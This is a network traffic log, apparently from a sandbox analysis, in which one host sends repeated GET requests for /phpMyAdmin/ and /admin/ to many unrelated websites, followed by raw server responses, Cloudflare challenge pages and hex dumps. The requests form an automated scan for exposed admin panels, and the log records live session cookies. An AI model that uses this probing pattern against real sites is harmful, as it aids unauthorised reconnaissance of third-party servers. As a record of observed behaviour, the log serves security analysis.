2024-02-05 11:16:10 UTC  1096  IN  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
2024-02-05 11:16:10 UTC  149  IN  Data Ascii: ou are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
154 | 192.168.2.6 | 63426 | 3.134.125.175 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 190 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: 3fba-180-252-166-236.ngrok.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 249 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Ngrok-Error-Code: ERR_NGROK_3200
Ngrok-Trace-Id: 7e51c86663c7b523fa199cebb69dfc45
Referrer-Policy: no-referrer
Date: Mon, 05 Feb 2024 11:16:10 GMT
Transfer-Encoding: chunked
2024-02-05 11:16:10 UTC | 937 | IN | Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
2024-02-05 11:16:10 UTC | 1498 | IN | Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


Session ID | Source IP | Source Port | Destination IP | Destination Port
155 | 192.168.2.6 | 63124 | 3.141.96.53 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 174 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: money-farm.cc
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 113 | IN | HTTP/1.1 439 <none>
date: Mon, 05 Feb 2024 11:16:10 GMT
content-length: 0
server: NginX
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
156 | 192.168.2.6 | 63389 | 172.67.170.147 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 182 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: poligrafosecuador.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 568 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fHNpvv4Bwpgi0SRkZIE5qxU9OhTs1h9ch5BZmyd5PC9pSDNwl8XXx4dDYwesaUwPvCMWoqoY324991cqkQBWQIg8mY71MhgKhG03j6PglZUJ1wHDOXJ6MHxHIWakTAnPMPjG7B9Y0xE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd5cd91a0701-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:10 UTC | 168 | IN | Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
2024-02-05 11:16:10 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
157 | 192.168.2.6 | 63699 | 188.212.100.154 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 172 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: zarkana2.ro
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 543 | IN | HTTP/1.1 200 OK
Connection: close
set-cookie: PHPSESSID=6pvqm6q62njom0hjf0nsedqk27; path=/; secure
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Mon, 05 Feb 2024 11:17:36 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-02-05 11:16:10 UTC | 825 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2163<html><head><meta property="og:url" content="https://zarkana2.ro/" /><meta property="og:type" content="website" /><meta property="og:title" content="Zarkana2 - PVM HARD" /><meta property="og:description" content="Zarkana2 este cel mai bun serve
2024-02-05 11:16:10 UTC | 7730 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: clasic,server,privat,server privat" /><meta name="viewport" content="width=1110"><title>Zarkana2 - PVM HARD</title><link rel="icon" type="image/png" href="images/favicon.png" ><script async src="https://www.googletagmanager.com/gtag/js?id=UA-75635721-
2024-02-05 11:16:10 UTC | 3789 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ec1<tr class="top"><td width="25"><img src='images/ranking/ranking_first_place.png' /></td><td width="100">Unique</td></tr> <tr><td colspan="3" height="5"></td></tr></table></td> </tr> <tr> <td><img src="images/wmbm2_19


Session ID | Source IP | Source Port | Destination IP | Destination Port
158 | 192.168.2.6 | 63156 | 195.85.23.95 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 339 | OUT | GET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 858 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=c698aa81d303b6657c01a45b96f05fa3; path=/; domain=.bongacams.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: fv=ZQp3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: uh=GJAABKqyLmuAoJAgHyukJwOxoaSVDt==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                location: /phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded1806-web12
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5cec727bb4-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:10 UTC | 88 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 52<html><head><meta http-equiv="refresh" content="0;url=/phpmyadmin"/></head></html>
2024-02-05 11:16:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
159 | 192.168.2.6 | 63645 | 77.240.114.212 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 173 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 335 | IN | HTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:17:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache-Coyote/1.1
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1060
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:10 UTC | 1060 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.14 (Debian) - Informe de Error</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:wh


Session ID | Source IP | Source Port | Destination IP | Destination Port
160 | 192.168.2.6 | 63421 | 138.197.59.199 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 184 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 585 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=dw-1Bdqxl86HApBORrnH4OZj.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-02-05 11:16:10 UTC | 554 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


Session ID | Source IP | Source Port | Destination IP | Destination Port
161 | 192.168.2.6 | 65137 | 172.66.43.117 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 168 | OUT | GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 761 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                www-authenticate: Basic realm="EnterPassword"
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L9kkyoQvPW6fSkIWqiKcni1N2rwwLhWOAFaSnzsPKS%2Fu9w8OCMBE65DYS5%2FsHV43WABcgJC%2FIULWQFh2R20KsNjlQQSw9W9EtqUMOczeY4UdD%2FJPQXxyDF41s2713Xc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5eb8c94566-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:10 UTC | 608 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
2024-02-05 11:16:10 UTC | 98 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: idden</h2><p>Access to this resource on the server is denied!</p></div></div></body></html>
2024-02-05 11:16:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
162 | 192.168.2.6 | 63479 | 104.22.74.220 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 174 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 1186 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e0b5d6761-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:10 UTC | 183 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 357a<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" cont
2024-02-05 11:16:10 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ent="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 29 3b 7d 7d 40 6d 69 78 69 6e 20 6c 69 67 68 74 2d 6d 6f 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 63 6f 6c 6f 72 3a 20 23 33 31 33 31 33 31 3b 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 30 30 35 31 63 33 3b 20 26 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 65 65 37 33 30 61 3b 7d 7d 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 20 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 20 2e 66 6f 6e 74 2d 72 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 66 63 35 37 34 61 3b 7d 20 2e 62 69 67 2d 62 75 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oiLz48L3N2Zz4);}}@mixin light-mode{background-color: transparent; color: #313131; a {color: #0051c3; &:hover {text-decoration: underline; color: #ee730a;}} .lds-ring div {border-color: #595959 transparent transparent;} .font-red {color: #fc574a;} .big-but
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2c 2e 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: gin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-heig
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mage:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGEx
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .5rem}.footer .ray-id{text-align:center;code{font-family:monaco,courier,monospace}}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (width <= 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:i
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 6d 6f 6a 61 64 6f 76 65 72 61 2e 73 6b 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 31 37 30 39 37 27 2c 63 52 61 79 3a 20 27 38 35 30 61 62 64 35 65 30 62 35 64 36 37 36 31 27 2c 63 48 61 73 68 3a 20 27 36 31 65 63 65 36 33 62 34 66 39 38 36 30 39 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 70 68 70 4d 79 41 64 6d 69 6e 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 79 74 73 4a 42 4d 36 6e 78 4d 39 76 56 2e 30 6e 78 53 74 61 64 42 6a 6f 56 58 50 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "mojadovera.sk",cType: 'managed',cNounce: '17097',cRay: '850abd5e0b5d6761',cHash: '61ece63b4f98609',cUPMDTk: "\/phpMyAdmin\/?__cf_chl_tk=ytsJBM6nxM9vV.0nxStadBjoVXPL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 46 59 6f 77 79 49 34 51 34 6a 67 68 4e 68 7a 74 35 70 39 45 43 56 4b 33 41 71 77 76 72 56 4e 48 66 65 34 77 48 54 77 56 70 47 71 79 4e 50 47 71 6b 4e 51 71 4c 71 68 46 55 61 6b 75 2d 55 6c 65 54 46 59 71 74 64 30 78 45 68 52 38 44 75 58 6f 4a 55 4c 30 41 4f 59 4a 64 39 6a 44 4e 30 6e 56 43 68 78 5f 6b 38 6c 34 47 2d 30 6f 79 55 68 71 7a 57 70 66 57 76 56 55 51 68 78 66 36 59 45 5a 6d 50 62 30 54 6f 73 44 39 6c 71 38 70 75 54 6e 61 57 30 42 76 73 51 6c 64 4d 33 6c 31 4e 31 62 4f 33 55 30 41 5f 66 73 6d 4f 62 33 53 58 56 47 64 48 70 78 53 44 6d 36 39 4a 51 70 41 45 41 75 51 66 71 45 47 79 67 69 4c 43 35 34 77 5f 53 34 62 48 31 62 43 37 54 64 7a 37 2d 73 30 78 59 41 38 51 4b 68 69 6c 73 70 70 49 36 37 41 53 4c 6b 39 4b 35 35 48 62 36 43 6a 43 73 42 4d 68 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: FYowyI4Q4jghNhzt5p9ECVK3AqwvrVNHfe4wHTwVpGqyNPGqkNQqLqhFUaku-UleTFYqtd0xEhR8DuXoJUL0AOYJd9jDN0nVChx_k8l4G-0oyUhqzWpfWvVUQhxf6YEZmPb0TosD9lq8puTnaW0BvsQldM3l1N1bO3U0A_fsmOb3SXVGdHpxSDm69JQpAEAuQfqEGygiLC54w_S4bH1bC7Tdz7-s0xYA8QKhilsppI67ASLk9K55Hb6CjCsBMhn
